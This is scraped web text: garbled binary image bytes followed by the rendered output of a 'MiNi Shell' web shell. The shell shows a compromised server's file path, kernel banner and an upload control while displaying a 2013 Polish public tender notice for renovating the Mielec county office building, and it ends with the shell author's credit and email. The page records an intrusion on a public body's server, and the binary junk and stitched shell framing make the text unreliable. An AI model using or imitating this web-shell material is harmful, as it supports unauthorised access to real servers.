JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131025/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131025/435920-N-2013.html

<p class="kh_header"><b>Mielec: przebudowa i remont budynku Starostwa Powiatowego w Mielcu przy ul. Wyspiańskiego 6 - etap I</b><br>
<b>Numer ogłoszenia: 435920 - 2013; data zamieszczenia: 25.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Mielecki , ul. Sękowskiego 2B, 39-300 Mielec, woj. podkarpackie, tel. 017 7800400, faks 017 7800402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiat-mielecki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przebudowa i remont budynku Starostwa Powiatowego w Mielcu przy ul. Wyspiańskiego 6 - etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane pn. przebudowa i remont budynku Starostwa Powiatowego w Mielcu przy ul. Wyspiańskiego 6 - etap I obejmujący wykonanie robót wewnętrznych budynku. 

Ogólny zakres prac: 

a)Roboty budowlane 
- wymiana posadzek w  pomieszczeniach biurowych, socjalnych i technicznych Starostwa Powiatowego w Mielcu z wyłączeniem pomieszczeń biblioteki i poradni psychologiczno-pedagogicznej,
- poszerzenie otworów drzwiowych do pom. j.w.,
- malowanie pomieszczeń j.w.,
- przebudowa i budowa węzłów sanitarnych z przystosowaniem dla osób niepełnosprawnych,
- przebudowa pomieszczeń w piwnicy z przeznaczeniem dla archiwum zakładowego,
- remont klatki schodowej bocznej,
- zabezpieczenie PPOŻ budynku (montaż ścian i drzwi oddzielenia PPOŻ, montaż drzwi dymoszczelnych, zabezpieczenie stopu piwnicy, montaż klap dymowych),
- wymiana posadzki ciągu komunikacyjnego III piętra,
- wymiana okładzin ściennych ciągach komunikacyjnych z wyłączeniem parteru,
b)Roboty instalacyjne sanitarne:
- przebudowa przyłącza wody - wymiana wodomierza i urządzeń (filtr, zawór antyskażeniowy),
- przebudowa przyłącza kanalizacji sanitarnej
- montaż instalacji hydrantowej, 
- wymiana i budowa nowej instalacji wod-kan,
- przebudowa instalacji c.o. w msc. kolizji z drzwiami i w-c,
c)Instalacja wentylacji i klimatyzacji
- wykonanie orurowania instalacji klimatyzacji ( instalacja freonowa, instalacja odprowadzenia skroplin),
- wykonanie zasilania elektrycznego instalacji klimatyzacji ( jednostki wewnętrzne oraz agregaty skraplające)
- montaż przewodów sterujących instalacji klimatyzacji,
- wykonanie klimatyzacji serwerowni ( trzy pomieszczenia)
- montaż instalacji wentylacji mechanicznej (kanały, centrale wentylacyjne, agregat skraplający, nawilżacz i inne) 
- wykonanie zasilania CT nagrzewnicy centrali obsługującej archiwum,
- wykonanie konstrukcji  pod wentylatory wyciągowe,
- wykonanie instalacji  nadciśnieniowej klatki schodowej wraz z podkonstrukcją
d)instalacja elektryczna
- modernizacja układu pomiarowego wraz ze złączem kablowym
- wymiana i budowa nowej  instalacji elektrycznej, (za wyjątkiem części parteru,  piwnicy i pomieszczeń zajmowanych przez poradnię oznaczonych na rysunkach elektrycznych)
- montaż tablic obwodowych wnękowych , z drzwiczkami zamykanymi na klucz,
- montaż osprzętu w wykonaniu zwykłym i szczelnym p/t.
- montaż złącza kablowego wraz z przyłączem.
e)Montaż instalacji dedykowanych :
- oświetlenia podstawowego
- oświetlenia awaryjnego
- gniazd wtyczkowych
- zasilania i sterowania wentylacji i klimatyzacji
- zasilania urządzenia dźwigu osobowego
- teletechniczna
- ochrony od przepięć
- ochrony od porażeń
- połączeń wyrównawczych
- oświetlenia zewnętrznego na elewacji budynku
- dozoru
- instalacji SSP
4)Kolejność wykonywania prac.
Kolejność prac szczegółowo będzie ustalona na radach budowy, które będą odbywać się cyklicznie co tydzień , kolejność wg niżej wymienionego schematu:
a)Realizacja - I etap - montaż sieci teleinformatycznej w pom. serwerowni
-  przygotowanie pomieszczeń serwerowni pod względem budowlanym,
- wykonanie robót elektrycznych i teleinformatycznych w serwerowni tj. zasilanie elektryczne, zabezpieczenie odgromowe, uziemienie o niskiej impedancji (uziom), okablowanie sieciowe i telekomunikacyjne związane       
z przygotowaniem do zamontowania składników sieci komputerowej 
i telekomunikacyjnej (sprzęt sieciowy, serwery, centralki telekomunikacyjne itp.)w pomieszczeniach serwerowni,
- wykonanie instalacji klimatyzacji w serwerowni, 
- Wykonanie prac elektrycznych podstawowych i pomocniczych- podłączenie urządzeń teletechnicznych,
b)Realizacja - II etap - remont pomieszczeń dla wydziałów AB i OŚ
- remont pomieszczeń zlokalizowanych na III piętrze (część wydziału IR), wraz z montażem instalacji elektrycznej i teletechnicznej,
- remont pomieszczeń zlokalizowanych na parterze dla wydziału AB wraz z montażem instalacji elektrycznej i teletechnicznej,
- remont pomieszczeń zlokalizowanych na II piętrze dla wydziału OŚ wraz z montaże instalacji elektrycznej i teletechnicznej,
- montaż instalacji elektrycznej zasilającej w/w pomieszczenia.
c)Realizacja - III etap - pozostałe prace budowlane w uzgodnieniu z inwestorem i inspektorem nadzoru
5)Organizacja prac
Prace będą wykonywane w budynku czynnym, dla potrzeb robót budowlanych wyłączane będą poszczególne części kondygnacji. Zamawiający informuje, iż roboty budowlane mogą być wykonywane w godzinach 7:00 do 22:00 z tym że prace szczególnie uciążliwe tj. roboty rozbiórkowe od godz. 15:00 do 22:00  po wcześniejszym uzgodnieniu z inspektorem nadzoru.
Dla wykonywania prac Wykonawca robót zobowiązany będzie do przenoszenia regałów i dokumentów z pomieszczeń remontowanych pod nadzorem pracowników Starostwa Powiatowego w Mielcu. Pracownicy wykonawcy zobowiązani będą do utrzymywania porządku i czystości na ciągach komunikacyjnych i w remontowanych pomieszczeniach. 
6)Dane ogólne dotyczące budynku
Powierzchnia użytkowa: 3 626,18 m2
Powierzchnia zabudowy: 945,77 m2
Kubatura brutto:  ~ 14950 m3
Piwnica:
Powierzchnia użytkowa - 725,10 m2
Kubatura netto ~ 1825 m3
Parter
Powierzchnia użytkowa - 765,03 m2
Kubatura netto ~ 2370 m3
Piętro I
Powierzchnia użytkowa - 709,06 m2
Kubatura ~ 2020 m3
Piętro II
Powierzchnia użytkowa - 715,17 m2
Kubatura ~ 2019 m3
Piętro III
Powierzchnia użytkowa - 706,63 m2
Kubatura ~ 2062 m3
7)Sposób wykonania przedmiotu zamówienia określają:
a)Projekt budowlany przebudowa i remont istniejącego budynku administracyjnego Starostwa Powiatowego w Mielcu przy ul. Wyspiańskiego 6 wraz z wykonaniem urządzeń budowlanych tj.: instalacjami wewnętrznymi; wod-kan, klimatyzacji, wentylacji elektryczną, słaboprądową, c.o. agregatu prądotwórczego, wraz z kablem zasilającym do budynku, przyłącza kanalizacji sanitarnej, remontu przyłącza wodociągowego, budową szybu dźwigowego wraz z usunięciem kolizji kabla nn oraz utwardzeń na działkach. 
b)Projekt wykonawczy j.w.
c)Specyfikacje techniczne wykonania i odbioru robót. j.w
d)Przedmiary robót 
stanowiące integralną część Specyfikacji Istotnych warunków Zamówienia. 
8)Kosztorys ofertowy należy przygotować na podstawie dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót. 
9)Zamawiający zastrzega, iż minimalny termin gwarancji na wykonany przedmiot zamówienia wynosi : 60 m- cy ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.26.27.00-8, 45.40.00.00-1, 45.30.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1)Zamawiający wymaga od wykonawców wniesienia wadium w wysokości 50 000 zł (słownie: pięćdziesiąt tysięcy złotych). 
2)Wadium może być wnoszone w:
-pieniądzu,
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 09.11.2000r o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości( Dz. U. Nr 109, poz.1158, z późn. zm.).
3)Wadium wnoszone w pieniądzu wpłaca się przed upływem terminu składania ofert na rachunek bankowy: Podkarpacki Bank Spółdzielczy Oddział w Mielcu, nr konta 25 8642 1168 2016 6803 8306 0008 z dopiskiem Wadium - wykonanie robót budowlanych - przebudowa i remont budynku Starostwa Powiatowego w Mielcu przy ul. Wyspiańskiego 6 - etap I. 
4)Wadium wnosi się przed upływem terminu składania ofert. 
5)Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
6)Zaleca się dołączyć do oferty dowód wniesienia wadium: kopia przelewu w przypadku wniesienia wadium w pieniądzu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania tego warunku wykonawcy zobowiązani są wykazać, iż wykonali co najmniej 2 roboty budowlane tożsame z przedmiotem zamówienia tj. roboty w zakresie przebudowy i remontu lub rozbudowy obiektów budowlanych ( budynków użyteczności publicznej lub budynków administracyjnych lub budynków biurowych),  o wartości zamówienia co najmniej  2 200 000 zł każda.
Na potwierdzenie spełniania tego warunku wykonawcy zobowiązani są do przedstawienia wykazu wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie robót budowlanych wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów dotyczących najważniejszych robót określających, czy roboty te zostały wykonane w sposób należyty, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia wykonawcy zobowiązani są wykazać, iż  dysponują  : 
a)kierownikiem budowy o specjalności konstrukcyjno - budowlanej 
b)kierownikiem robót o specjalności elektrycznej w zakresie instalacji elektrycznych,
c)kierownikiem robót o specjalności instalacyjnej w zakresie instalacji i urządzeń wodociągowych i kanalizacyjnych, cieplnych, wentylacyjnych.

Na potwierdzenie spełniania tego warunku wykonawcy zobowiązani są do przedstawienia wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami oraz złożenia oświadczenia, że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania tego warunku Wykonawca zobowiązany jest wykazać, iż dysponuje środkami finansowymi i/lub posiada zdolność kredytową na kwotę nie mniejszą niż 500 000,00 zł.

Na potwierdzenie spełniania tego warunku wykonawcy zobowiązani są do przedstawienia informacji banku lub spółdzielczej kasy oszczędnościowo - rozliczeniowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie z art. 26 ust. 2d o grupie kapitałowej</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza zmianę istotnych postanowień zawartej umowy w przypadku :
1) potrzeby wykonania robót zamiennych w stosunku do robót planowanych, jeżeli roboty zamienne uzasadnione są koniecznością zwiększenia bezpieczeństwa robót budowlanych lub usprawnią proces budowlany  - zgodnie z zapisami art. 23 ust. 1 ustawy Prawo budowlane, 
2)  zmiany stawki podatku od towarów i usług VAT, wynagrodzenie ulegnie zmianie stosowanie do zmiany stawki podatku bez zmiany wynagrodzenia netto.
2. Zmiana postanowień umowy wymaga formy pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat-mielecki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Mielcu 
39-300 Mielec, ul. Sękowskiego 2b.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.11.2013 godzina 12:00, miejsce: Starostwo Powiatowe w Mielcu 
39-300 Mielec, ul. Sękowskiego 2b - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com